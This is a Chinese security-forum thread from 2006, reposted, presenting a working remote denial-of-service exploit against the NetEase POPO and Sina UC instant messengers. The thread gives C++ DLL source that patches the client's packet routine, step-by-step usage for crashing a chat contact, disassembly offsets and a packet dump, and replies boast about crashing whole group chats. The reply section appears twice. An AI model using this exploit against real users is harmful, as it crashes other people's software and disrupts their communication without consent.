[推荐][转帖]网易 POPO 和 Sina UC 2006 的远程 Dos by Team509-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[推荐][转帖]网易 POPO 和 Sina UC 2006 的远程 Dos by Team509

发表于: 2006-12-2 12:43 8807

[推荐][转帖]网易 POPO 和 Sina UC 2006 的远程 Dos by Team509

shoooo

2006-12-2 12:43

8807

网易 POPO
edaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4c8W2j5h3@1#2x3o6W2Q4x3X3g2U0L8$3#2Q4x3V1k6E0L8$3c8#2L8r3g2K6i4K6u0W2M7r3S2H3i4K6y4r3L8X3q4E0k6g2)9K6c8p5&6W2N6%4y4Q4x3U0k6X3K9h3I4W2i4K6y4p5j5i4u0@1K9h3y4D9k6g2)9J5y4Y4y4A6k6q4)9K6c8o6b7I4

操作方法跟UC的那个差不多，唯一的区别就是team509这几个字要放到最前面，那

个dll在这儿下载：394K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4c8W2j5h3@1#2x3o6W2Q4x3X3g2U0L8$3#2Q4x3V1k6H3L8%4m8G2c8r3!0K6i4K6u0W2k6r3I4D9

没什么好写的，把source code贴出来吧,需定义基地址为:0x50000000.

// popoDos.cpp : 定义 DLL 应用程序的入口点。
//
#include "stdafx.h"
#include "Winbase.h"
extern "C" __declspec(dllexport)  void  __fastcall my_pack(unsigned char *thiscall,unsigned char *nouse,unsigned char * src,unsigned int len);
void  __fastcall my_pack(unsigned char *thiscall,unsigned char *nouse,unsigned char * src,unsigned int len)
{

int real_pack = 0xcc5a90 ;
for (int i = 0 ; i< 0xff ; i++)
{
   if(memcmp((const void *)(src+i),"team509",7) == 0)
   {
         *(src+i-1) = 0xff;
         *(src+i-2) = 0xff;
   }
}
__asm{
            mov ecx,thiscall
            push len
            push src
            call real_pack
            add esp,0x100

            add ebp,0xa0
            ret 8

   }
}
void writemem()
{
   unsigned char packaddr[] = "xe9xe0x34x4f";
         HANDLE hProcess = GetCurrentProcess ();
   DWORD dwWritten = 0;

         WriteProcessMemory (hProcess,
                        (VOID *)0xcc3689,
                        (VOID *)packaddr,
                        4,
                        &dwWritten);
}
BOOL APIENTRY DllMain( HANDLE hModule,
                     DWORD  ul_reason_for_call,
                     LPVOID lpReserved
               )
{
unsigned int offset = 0 ;

if (ul_reason_for_call == DLL_PROCESS_ATTACH) {

   writemem();

}

return TRUE;
}

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

收藏・1

免费・7

支持

最新回复 (15)
shoooo 雪币： 398 活跃值： (343) 能力值： (RANK：650 ) 在线值：发帖 91 回帖 2169 粉丝 7 关注私信	shoooo 16 2 楼 Sina UC 2006 fc0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4c8W2j5h3@1#2x3o6W2Q4x3X3g2U0L8$3#2Q4x3V1k6E0L8$3c8#2L8r3g2K6i4K6u0W2M7r3S2H3i4K6y4r3L8X3q4E0k6g2)9K6c8p5&6W2N6%4y4Q4x3U0k6X3K9h3I4W2i4K6y4p5j5i4u0@1K9h3y4D9k6g2)9J5y4Y4y4A6k6q4)9K6c8o6b7H3 我也测试过2005III,这个问题也存在的，漏洞细节不描述了，有心人可以根据现象一望而知，主要描述一下做法：我也测试过2005III,这个问题也存在的，漏洞细节不描述了，有心人可以根据现象一望而知，主要描述一下做法： 1．你本地需要一个UC 的2005III版 2．启动它，把这个DLL(460K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4c8W2j5h3@1#2x3o6W2Q4x3X3g2U0L8$3#2Q4x3V1k6K6K9h3&6S2c8r3!0K6i4K6u0W2k6r3I4D9i4K6t1&6i4@1f1$3i4@1t1K6i4@1p5^5i4@1f1#2i4K6R3#2i4@1p5#2g2f1y4Q4c8e0N6Q4z5f1q4Q4z5o6c8Q4c8e0S2Q4b7V1k6Q4z5f1u0Q4c8e0N6Q4b7e0S2Q4z5p5u0Q4c8e0g2Q4z5o6k6Q4z5o6g2Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0k6Q4z5o6q4Q4b7e0W2Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0S2Q4b7V1k6Q4z5e0W2Q4c8e0c8Q4b7U0S2Q4b7f1q4V1L8r3I4Q4c8e0k6Q4b7U0y4Q4b7e0S2Q4c8e0g2Q4z5o6g2Q4b7e0g2Q4c8e0g2Q4b7U0N6Q4b7e0g2Q4c8e0g2Q4z5o6g2Q4b7U0N6Q4c8e0k6Q4z5o6S2Q4z5e0q4Q4c8e0k6Q4z5e0S2Q4b7f1k6Q4c8e0c8Q4b7V1c8Q4b7V1k6Q4c8e0N6Q4z5e0c8Q4b7e0S2J5k6h3#2G2N6r3g2D9K9h3u0Q4x3V1y4Y4L8$3!0Y4L8r3g2Q4c8e0g2Q4z5o6N6Q4b7V1q4Q4c8e0k6Q4z5f1c8Q4b7e0g2Q4c8e0N6Q4z5f1q4Q4z5o6c8Q4c8e0N6Q4b7f1y4Q4b7f1y4Q4c8e0c8Q4b7U0S2Q4z5o6m8Q4c8e0c8Q4b7U0S2Q4b7f1q4Q4c8e0g2Q4b7U0m8Q4b7U0q4Q4c8e0k6Q4z5e0S2Q4b7f1k6Q4c8e0c8Q4b7V1q4Q4z5o6k6Q4c8e0y4Q4z5o6m8Q4z5o6t1`. 3．找到一个在线的联系人，送文本消息给他，恩，这个消息最后7个字符得是”team509”这7字真言，J 4．这个联系人的UC马上就崩溃了，赫赫。 2006-12-2 12:43 0
linex 雪币： 279 活跃值： (145) 能力值： ( LV9，RANK：290 ) 在线值：发帖 11 回帖 267 粉丝 0 关注私信	linex 7 3 楼强． 2006-12-2 12:45 0
shoooo 雪币： 398 活跃值： (343) 能力值： (RANK：650 ) 在线值：发帖 91 回帖 2169 粉丝 7 关注私信	shoooo 16 4 楼刚刚下载了个popo学习一下，偏移地址有一些变化 00CE367D 52 push edx 00CE367E 8B45 BC mov eax,dword ptr ss:[ebp-44] 00CE3681 50 push eax 00CE3682 8B4D EC mov ecx,dword ptr ss:[ebp-14] 00CE3685 8B49 08 mov ecx,dword ptr ds:[ecx+8] 00CE3688 E8 03240000 call SOX.00CE5A90 这里是发前明码协议的地方只要把聊天包的长度的WORD改成FFFF，对方就crash了 02073F28 3E 02 F5 0B 2A 00 06 00 18 00 40 00 00 00 0E 00 >?*...@.... 02073F38 19 00 74 75 72 62 6F 38 36 33 34 31 7A 68 40 70 .turbo86341zh@p 02073F48 6F 70 6F 2E 31 36 33 2E 63 6F 6D 1F 00 04 00 00 opo.163.com... 02073F58 00 01 00 04 00 CB CE CC E5 02 00 01 00 30 03 00 ...宋体..0. 02073F68 01 00 30 04 00 05 00 68 65 6C 6C 6F 00 00 00 00 .0..hello.... FF FF 对隐身和不在线的也要效 2006-12-2 13:42 0
ufwt 雪币： 120 活跃值： (30) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 41 粉丝 0 关注私信	ufwt 5 楼新版的淘宝旺旺的help->about也有他们的名字，据称还有MSN的漏洞(说是可以远程溢出),不知道他们什么时候能放出来,好像他们对IM很有一套 2006-12-2 13:48 0
heXer 雪币： 254 活跃值： (126) 能力值： ( LV8，RANK：130 ) 在线值：发帖 12 回帖 802 粉丝 2 关注私信	heXer 3 6 楼有qq的吗 2006-12-2 16:07 0
shoooo 雪币： 398 活跃值： (343) 能力值： (RANK：650 ) 在线值：发帖 91 回帖 2169 粉丝 7 关注私信	shoooo 16 7 楼网易泡泡在组里面（相当QQ的群）也可以这么玩聊天室100多人直接踢馆 2006-12-2 16:09 0
Isaiah 雪币： 331 活跃值： (56) 能力值： ( LV13，RANK：410 ) 在线值：发帖 68 回帖 1293 粉丝 2 关注私信	Isaiah 10 8 楼你改行搞Hack了？ 2006-12-2 17:54 0
根太软雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 31 粉丝 0 关注私信	根太软 9 楼听说新浪UC有在线脱衣看的.在加密房间里的. 2006-12-2 23:12 0
wynney 雪币： 224 活跃值： (147) 能力值： ( LV9，RANK：970 ) 在线值：发帖 65 回帖 1109 粉丝 8 关注私信	wynney 24 10 楼最初由根太软* 发布* 听说新浪UC有在线脱衣看的.在加密房间里的. 晕 2006-12-2 23:28 0
heimei 雪币： 80 活跃值： (1260) 能力值： ( LV2，RANK：10 ) 在线值：发帖 26 回帖 278 粉丝 1 关注私信	heimei 11 楼耳听为虚``眼见为实 2006-12-3 08:47 0
LOVE 雪币： 2003 活跃值： (101) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 246 粉丝 1 关注私信	LOVE 12 楼丫真流氓 ... 也就是用发包器对一个网段发 FFFF也成了... 2006-12-3 13:55 0
ufwt 雪币： 120 活跃值： (30) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 41 粉丝 0 关注私信	ufwt 13 楼 shoooo的意思是要在加密前，不能直接发ffff的。 2006-12-4 16:27 0
playx 雪币： 146 活跃值： (72) 能力值： ( LV4，RANK：50 ) 在线值：发帖 25 回帖 445 粉丝 0 关注私信	playx 1 14 楼最初由 Isaiah* 发布* 你改行搞Hack了？其实Cracker和Hacker是没有严格的区别的. 2006-12-4 19:54 0
deepwater 雪币： 1309 活跃值： (232) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 202 粉丝 0 关注私信	deepwater 15 楼原贴和dll 已经没了 2006-12-4 21:22 0
backuper 雪币： 200 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 202 粉丝 0 关注私信	backuper 16 楼没有成功.. 用哪个 remotelib 的哪个函数注入呢？ uc 2005 iii Calling: RemoteLoadLibrary((HWND)0x00030270, _T("E:\dll\sinaDos.dll")); Function succeeded. Return value: 0x30000000 可是还是失败发送以那个《这个消息最后7个字符得是”team509”这7字真言》还是对方没有效果呵呵！！失败！谁指点指点？？ 2006-12-5 12:06 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

shoooo

发帖

2169

回帖

650

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (15)
shoooo 雪币： 398 活跃值： (343) 能力值： (RANK：650 ) 在线值：发帖 91 回帖 2169 粉丝 7 关注私信	shoooo 16 2 楼 Sina UC 2006 fc0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4c8W2j5h3@1#2x3o6W2Q4x3X3g2U0L8$3#2Q4x3V1k6E0L8$3c8#2L8r3g2K6i4K6u0W2M7r3S2H3i4K6y4r3L8X3q4E0k6g2)9K6c8p5&6W2N6%4y4Q4x3U0k6X3K9h3I4W2i4K6y4p5j5i4u0@1K9h3y4D9k6g2)9J5y4Y4y4A6k6q4)9K6c8o6b7H3 我也测试过2005III,这个问题也存在的，漏洞细节不描述了，有心人可以根据现象一望而知，主要描述一下做法：我也测试过2005III,这个问题也存在的，漏洞细节不描述了，有心人可以根据现象一望而知，主要描述一下做法： 1．你本地需要一个UC 的2005III版 2．启动它，把这个DLL(460K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4c8W2j5h3@1#2x3o6W2Q4x3X3g2U0L8$3#2Q4x3V1k6K6K9h3&6S2c8r3!0K6i4K6u0W2k6r3I4D9i4K6t1&6i4@1f1$3i4@1t1K6i4@1p5^5i4@1f1#2i4K6R3#2i4@1p5#2g2f1y4Q4c8e0N6Q4z5f1q4Q4z5o6c8Q4c8e0S2Q4b7V1k6Q4z5f1u0Q4c8e0N6Q4b7e0S2Q4z5p5u0Q4c8e0g2Q4z5o6k6Q4z5o6g2Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0k6Q4z5o6q4Q4b7e0W2Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0S2Q4b7V1k6Q4z5e0W2Q4c8e0c8Q4b7U0S2Q4b7f1q4V1L8r3I4Q4c8e0k6Q4b7U0y4Q4b7e0S2Q4c8e0g2Q4z5o6g2Q4b7e0g2Q4c8e0g2Q4b7U0N6Q4b7e0g2Q4c8e0g2Q4z5o6g2Q4b7U0N6Q4c8e0k6Q4z5o6S2Q4z5e0q4Q4c8e0k6Q4z5e0S2Q4b7f1k6Q4c8e0c8Q4b7V1c8Q4b7V1k6Q4c8e0N6Q4z5e0c8Q4b7e0S2J5k6h3#2G2N6r3g2D9K9h3u0Q4x3V1y4Y4L8$3!0Y4L8r3g2Q4c8e0g2Q4z5o6N6Q4b7V1q4Q4c8e0k6Q4z5f1c8Q4b7e0g2Q4c8e0N6Q4z5f1q4Q4z5o6c8Q4c8e0N6Q4b7f1y4Q4b7f1y4Q4c8e0c8Q4b7U0S2Q4z5o6m8Q4c8e0c8Q4b7U0S2Q4b7f1q4Q4c8e0g2Q4b7U0m8Q4b7U0q4Q4c8e0k6Q4z5e0S2Q4b7f1k6Q4c8e0c8Q4b7V1q4Q4z5o6k6Q4c8e0y4Q4z5o6m8Q4z5o6t1`. 3．找到一个在线的联系人，送文本消息给他，恩，这个消息最后7个字符得是”team509”这7字真言，J 4．这个联系人的UC马上就崩溃了，赫赫。 2006-12-2 12:43 0
linex 雪币： 279 活跃值： (145) 能力值： ( LV9，RANK：290 ) 在线值：发帖 11 回帖 267 粉丝 0 关注私信	linex 7 3 楼强． 2006-12-2 12:45 0
shoooo 雪币： 398 活跃值： (343) 能力值： (RANK：650 ) 在线值：发帖 91 回帖 2169 粉丝 7 关注私信	shoooo 16 4 楼刚刚下载了个popo学习一下，偏移地址有一些变化 00CE367D 52 push edx 00CE367E 8B45 BC mov eax,dword ptr ss:[ebp-44] 00CE3681 50 push eax 00CE3682 8B4D EC mov ecx,dword ptr ss:[ebp-14] 00CE3685 8B49 08 mov ecx,dword ptr ds:[ecx+8] 00CE3688 E8 03240000 call SOX.00CE5A90 这里是发前明码协议的地方只要把聊天包的长度的WORD改成FFFF，对方就crash了 02073F28 3E 02 F5 0B 2A 00 06 00 18 00 40 00 00 00 0E 00 >?*...@.... 02073F38 19 00 74 75 72 62 6F 38 36 33 34 31 7A 68 40 70 .turbo86341zh@p 02073F48 6F 70 6F 2E 31 36 33 2E 63 6F 6D 1F 00 04 00 00 opo.163.com... 02073F58 00 01 00 04 00 CB CE CC E5 02 00 01 00 30 03 00 ...宋体..0. 02073F68 01 00 30 04 00 05 00 68 65 6C 6C 6F 00 00 00 00 .0..hello.... FF FF 对隐身和不在线的也要效 2006-12-2 13:42 0
ufwt 雪币： 120 活跃值： (30) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 41 粉丝 0 关注私信	ufwt 5 楼新版的淘宝旺旺的help->about也有他们的名字，据称还有MSN的漏洞(说是可以远程溢出),不知道他们什么时候能放出来,好像他们对IM很有一套 2006-12-2 13:48 0
heXer 雪币： 254 活跃值： (126) 能力值： ( LV8，RANK：130 ) 在线值：发帖 12 回帖 802 粉丝 2 关注私信	heXer 3 6 楼有qq的吗 2006-12-2 16:07 0
shoooo 雪币： 398 活跃值： (343) 能力值： (RANK：650 ) 在线值：发帖 91 回帖 2169 粉丝 7 关注私信	shoooo 16 7 楼网易泡泡在组里面（相当QQ的群）也可以这么玩聊天室100多人直接踢馆 2006-12-2 16:09 0
Isaiah 雪币： 331 活跃值： (56) 能力值： ( LV13，RANK：410 ) 在线值：发帖 68 回帖 1293 粉丝 2 关注私信	Isaiah 10 8 楼你改行搞Hack了？ 2006-12-2 17:54 0
根太软雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 31 粉丝 0 关注私信	根太软 9 楼听说新浪UC有在线脱衣看的.在加密房间里的. 2006-12-2 23:12 0
wynney 雪币： 224 活跃值： (147) 能力值： ( LV9，RANK：970 ) 在线值：发帖 65 回帖 1109 粉丝 8 关注私信	wynney 24 10 楼最初由根太软* 发布* 听说新浪UC有在线脱衣看的.在加密房间里的. 晕 2006-12-2 23:28 0
heimei 雪币： 80 活跃值： (1260) 能力值： ( LV2，RANK：10 ) 在线值：发帖 26 回帖 278 粉丝 1 关注私信	heimei 11 楼耳听为虚``眼见为实 2006-12-3 08:47 0
LOVE 雪币： 2003 活跃值： (101) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 246 粉丝 1 关注私信	LOVE 12 楼丫真流氓 ... 也就是用发包器对一个网段发 FFFF也成了... 2006-12-3 13:55 0
ufwt 雪币： 120 活跃值： (30) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 41 粉丝 0 关注私信	ufwt 13 楼 shoooo的意思是要在加密前，不能直接发ffff的。 2006-12-4 16:27 0
playx 雪币： 146 活跃值： (72) 能力值： ( LV4，RANK：50 ) 在线值：发帖 25 回帖 445 粉丝 0 关注私信	playx 1 14 楼最初由 Isaiah* 发布* 你改行搞Hack了？其实Cracker和Hacker是没有严格的区别的. 2006-12-4 19:54 0
deepwater 雪币： 1309 活跃值： (232) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 202 粉丝 0 关注私信	deepwater 15 楼原贴和dll 已经没了 2006-12-4 21:22 0
backuper 雪币： 200 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 202 粉丝 0 关注私信	backuper 16 楼没有成功.. 用哪个 remotelib 的哪个函数注入呢？ uc 2005 iii Calling: RemoteLoadLibrary((HWND)0x00030270, _T("E:\dll\sinaDos.dll")); Function succeeded. Return value: 0x30000000 可是还是失败发送以那个《这个消息最后7个字符得是”team509”这7字真言》还是对方没有效果呵呵！！失败！谁指点指点？？ 2006-12-5 12:06 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复